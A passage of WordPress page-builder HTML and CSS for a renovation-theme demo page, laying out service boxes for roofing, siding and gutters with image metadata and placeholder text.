.skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-dd2fb7db-992d-423c-ac16-d676e4901ec9 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a new roof replacement from Dunrite.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"02734963-0b31-4312-8c71-a66457a80c8b\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-02734963-0b31-4312-8c71-a66457a80c8b .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-02734963-0b31-4312-8c71-a66457a80c8b\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"180058dd-db27-45c4-a0de-f8703e853737\"} -->\n<style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-180058dd-db27-45c4-a0de-f8703e853737 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"767f5573-d592-456c-a81e-eac9c44adadf\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-767f5573-d592-456c-a81e-eac9c44adadf .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-767f5573-d592-456c-a81e-eac9c44adadf\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"6a884b41-c026-4a57-9b2b-25862220e646\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6a884b41-c026-4a57-9b2b-25862220e646 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ae0d7f03-a30d-438a-9db9-6de087194c7c\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-ae0d7f03-a30d-438a-9db9-6de087194c7c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ae0d7f03-a30d-438a-9db9-6de087194c7c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ae0d7f03-a30d-438a-9db9-6de087194c7c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7c398a30-3a74-4ab1-b45d-62ced1bb0f57\"} -->\n<style type=\"text/css\"> .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7c398a30-3a74-4ab1-b45d-62ced1bb0f57 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"aff0817d-6564-42a6-8efc-48ebb76c7727\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-aff0817d-6564-42a6-8efc-48ebb76c7727 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-aff0817d-6564-42a6-8efc-48ebb76c7727\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/theme